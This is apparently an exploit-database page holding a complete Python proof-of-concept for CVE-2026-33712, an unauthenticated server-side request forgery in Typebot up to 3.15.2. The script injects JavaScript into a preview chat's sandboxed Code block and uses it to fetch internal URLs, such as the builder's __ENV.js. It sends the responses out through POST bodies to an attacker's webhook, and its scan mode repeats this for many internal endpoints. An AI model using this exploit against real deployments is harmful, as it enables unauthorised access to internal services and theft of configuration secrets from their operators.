5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit

Typebot <= 3.15.2 - Unauthenticated SSRF via isolated-vm sandbox fetch
that bypasses validateHttpReqUrl() SSRF protection.

The fetch() inside the isolated-vm sandbox returns response.text() directly,
so the result is a string, not a Response object. Do NOT call .text() on it.
"""

import requests
import json
import sys
import urllib.parse
import argparse
import time
import random
import string
import os
import re


ENDPOINTS_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "endpoints.txt")


def rand_id(length=6):
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))


def js_escape(s):
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")


def build_payload(code):
    rid = rand_id()
    return {
        "typebotId": f"sr-{rid}",
        "typebot": {
            "version": "6",
            "id": f"bt-{rid}",
            "workspaceId": "test",
            "updatedAt": "2026-01-01T00:00:00.000Z",
            "groups": [
                {
                    "id": f"g1-{rid}", "title": "Start",
                    "graphCoordinates": {"x": 0, "y": 0},
                    "blocks": [
                        {"id": f"b1-{rid}", "type": "start", "label": "Start",
                         "outgoingEdgeId": f"e1-{rid}"}
                    ],
                },
                {
                    "id": f"g2-{rid}", "title": "Run",
                    "graphCoordinates": {"x": 200, "y": 0},
                    "blocks": [
                        {
                            "id": f"b2-{rid}", "type": "Code",
                            "outgoingEdgeId": f"e2-{rid}",
                            "options": {
                                "name": "SSRF",
                                "content": code,
                                "isExecutedOnClient": False,
                                "isUnsafe": True,
                            },
                        }
                    ],
                },
            ],
            "edges": [
                {"id": f"e1-{rid}", "from": {"blockId": f"b1-{rid}"},
                 "to": {"groupId": f"g2-{rid}"}}
            ],
            "events": [
                {"id": f"ev1-{rid}", "type": "start", "outgoingEdgeId": f"e1-{rid}",
                 "graphCoordinates": {"x": 0, "y": 0}}
            ],
            "variables": [{"id": f"v1-{rid}", "name": "r"}],
            "settings": {"general": {}},
            "theme": {"general": {}, "chat": {}},
        },
    }


def send_ssrf(base_url, code, timeout=20):
    payload = build_payload(code)
    endpoint = f"{base_url.rstrip('/')}/api/v1/typebots/{payload['typebotId']}/preview/startChat"
    headers = {"Content-Type": "application/json", "Accept": "application/json"}
    try:
        r = requests.post(endpoint, json=payload, headers=headers, timeout=timeout)
        return r.json()
    except requests.exceptions.RequestException as e:
        return {"error": str(e)}


def preflight_check(base_url, webhook=None, timeout=15):
    """Probe the target to determine if it's vulnerable, patched, or unreachable.
    Returns one of: 'vulnerable', 'patched', 'endpoint_missing', 'error'."""
    wh_callback = ""
    if webhook:
        wh_callback = f"""
    await fetch("{webhook}", {{
        method: "POST",
        headers: {{"Content-Type": "text/plain"}},
        body: "preflight-ok: " + (typeof r === "string" ? r.substring(0,100) : (await r.text()).substring(0,100))
    }});
"""
    code = f"""
try {{
    var r = await fetch("http://127.0.0.1:3000/");{wh_callback}
}} catch(e) {{}}
var x = 1;
"""
    resp = send_ssrf(base_url, code, timeout)
    if "sessionId" in resp:
        return "vulnerable"
    msg = resp.get("message", "") or json.dumps(resp)
    if "UNAUTHORIZED" in msg or "You must be logged in" in msg:
        return "patched"
    if "NOT_FOUND" in msg or "Not found" in msg:
        return "endpoint_missing"
    if "error" in resp:
        return f"error: {resp['error'][:80]}"
    return f"unexpected: {json.dumps(resp)[:100]}"


def exfiltrate(base_url, internal_url, webhook, label="", timeout=20):
    """Fetch an internal URL and exfiltrate its content via POST body to webhook."""
    safe = js_escape(internal_url)
    l_escaped = urllib.parse.quote(label or internal_url, safe="")
    code = f"""
try {{
    var r = await fetch("{safe}");
    var b = typeof r === "string" ? r : await r.text();
    await fetch("{webhook}", {{
        method: "POST",
        headers: {{"Content-Type": "text/plain"}},
        body: "{l_escaped}: " + b
    }});
}} catch(e) {{
    await fetch("{webhook}?err_{l_escaped}=" + encodeURIComponent(e.toString().substring(0,200)));
}}
"""
    return send_ssrf(base_url, code, timeout)


def ensure_scheme(url):
    if url and not url.startswith("http://") and not url.startswith("https://"):
        return f"http://{url}"
    return url


def detect_viewer_url(target, timeout=15):
    """Probe /__ENV.js on target to find NEXT_PUBLIC_VIEWER_URL."""
    url = ensure_scheme(target).rstrip("/") + "/__ENV.js"
    try:
        r = requests.get(url, timeout=timeout)
        if r.status_code == 200:
            m = re.search(r'NEXT_PUBLIC_VIEWER_URL["\']?:\s*["\']([^"\']+)["\']', r.text)
            if m:
                viewer = m.group(1)
                print(f"[+] Detected viewer URL from __ENV.js: {viewer}")
                return viewer
    except requests.exceptions.RequestException:
        pass
    return None


def load_endpoints():
    """Load endpoint URLs from endpoints.txt (one URL per line, ignores blanks)."""
    if not os.path.exists(ENDPOINTS_FILE):
        print(f"[-] Endpoints file not found: {ENDPOINTS_FILE}", file=sys.stderr)
        return []

    targets = []
    with open(ENDPOINTS_FILE) as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            targets.append((ensure_scheme(line), line))
    return targets


def scan_targets(base_url, targets, webhook, delay=0.3):
    """Scan multiple internal URLs and exfiltrate results."""
    for i, (url, desc) in enumerate(targets):
        label = f"[{i+1}/{len(targets)}] {desc}"
        print(f"  {label:50s} {url}", end=" ", flush=True)
        resp = exfiltrate(base_url, url, webhook, label)
        if "sessionId" in resp:
            print("OK")
        elif "error" in resp:
            print(f"FAIL: {resp['error'][:60]}")
        else:
            s = json.dumps(resp)
            print(f"UNEXPECTED: {s[:80]}")
        time.sleep(delay)


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Single URL
  %(prog)s -t https://bot.example.com -u http://127.0.0.1:3000/__ENV.js -w https://webhook.site/your-uuid

  # Scan all endpoints from endpoints.txt
  %(prog)s -t https://bot.example.com -w https://webhook.site/your-uuid --scan

  # Auto-detect viewer URL from builder's __ENV.js
  %(prog)s -t https://builder.example.com -w https://webhook.site/your-uuid --detect-viewer --scan

  # Single test with output to endpoint
  %(prog)s -t https://bot.example.com -u http://typebot-builder:3000/ -w https://webhook.site/your-uuid
        """,
    )
    parser.add_argument("-t", "--target", required=True, help="Vulnerable Typebot instance URL (e.g. https://bot.example.com)")
    parser.add_argument("-u", "--url", help="Internal URL to fetch via SSRF")
    parser.add_argument("-w", "--webhook", default=os.environ.get("WEBHOOK_URL"),
                        help="Webhook URL for data exfiltration (or set WEBHOOK_URL env var)")
    parser.add_argument("--scan", action="store_true",
                        help="Scan all URLs from endpoints.txt")
    parser.add_argument("--detect-viewer", action="store_true",
                        help="Auto-detect viewer URL from builder's __ENV.js and use it as target")
    parser.add_argument("--force", action="store_true",
                        help="Skip pre-flight checks and force execution")
    parser.add_argument("--timeout", type=int, default=20, help="Request timeout in seconds (default: 20)")
    parser.add_argument("--delay", type=float, default=0.3, help="Delay between scan requests (default: 0.3)")

    args = parser.parse_args()

    args.target = ensure_scheme(args.target)

    # Auto-detect viewer URL from builder
    if args.detect_viewer:
        print(f"[*] Probing: {args.target}")
        viewer = detect_viewer_url(args.target, args.timeout)
        if viewer:
            args.target = ensure_scheme(viewer)
        else:
            print("[-] Could not detect viewer URL, using target as-is")

    print(f"[*] Target:  {args.target}")

    if not args.webhook:
        print("[-] Error: --webhook / -w is required (or set WEBHOOK_URL env var)")
        print("    Get one at https://webhook.site")
        sys.exit(1)

    print(f"  Webhook: {args.webhook}")
    print()

    # Pre-flight check
    print("[*] Pre-flight: probing target...", end=" ", flush=True)
    status = preflight_check(args.target, args.webhook, args.timeout)
    print(status)
    if status == "patched":
        print("[-] Target is patched (auth required). SSRF not exploitable.")
        if not args.force:
            sys.exit(1)
    elif status == "endpoint_missing":
        print("[-] Endpoint not found. Target may be the builder (not viewer), wrong version, or wrong URL.")
        print("    Try --detect-viewer if this might be the builder.")
        if not args.force:
            sys.exit(1)
    elif status == "vulnerable":
        print("[+] Target appears VULNERABLE! Proceeding...")
    elif status.startswith("error"):
        print(f"[-] {status}")
        if not args.force:
            sys.exit(1)
    else:
        print(f"[-] {status}")
        if not args.force:
            sys.exit(1)
    print()

    # Scan mode
    if args.scan:
        targets = load_endpoints()
        if not targets:
            print("[-] No endpoints found. Make sure endpoints.txt exists with valid URLs.")
            sys.exit(1)
        print(f"[*] Scanning {len(targets)} endpoints from endpoints.txt...\n")
        scan_targets(args.target, targets, args.webhook, args.delay)
        print(f"\n[*] Done. Check your webhook ({args.webhook}) for results.")
        return

    # Single URL mode
    if not args.url:
        print("[-] Error: --url / -u is required, or use --scan to read from endpoints.txt")
        sys.exit(1)

    args.url = ensure_scheme(args.url)
    print(f"[*] Fetching: {args.url}")
    resp = exfiltrate(args.target, args.url, args.webhook)
    if "sessionId" in resp:
        print("[+] Request sent. Check webhook for response body.")
    else:
        print(f"[-] Failed: {json.dumps(resp)[:200]}")


if __name__ == "__main__":
    main()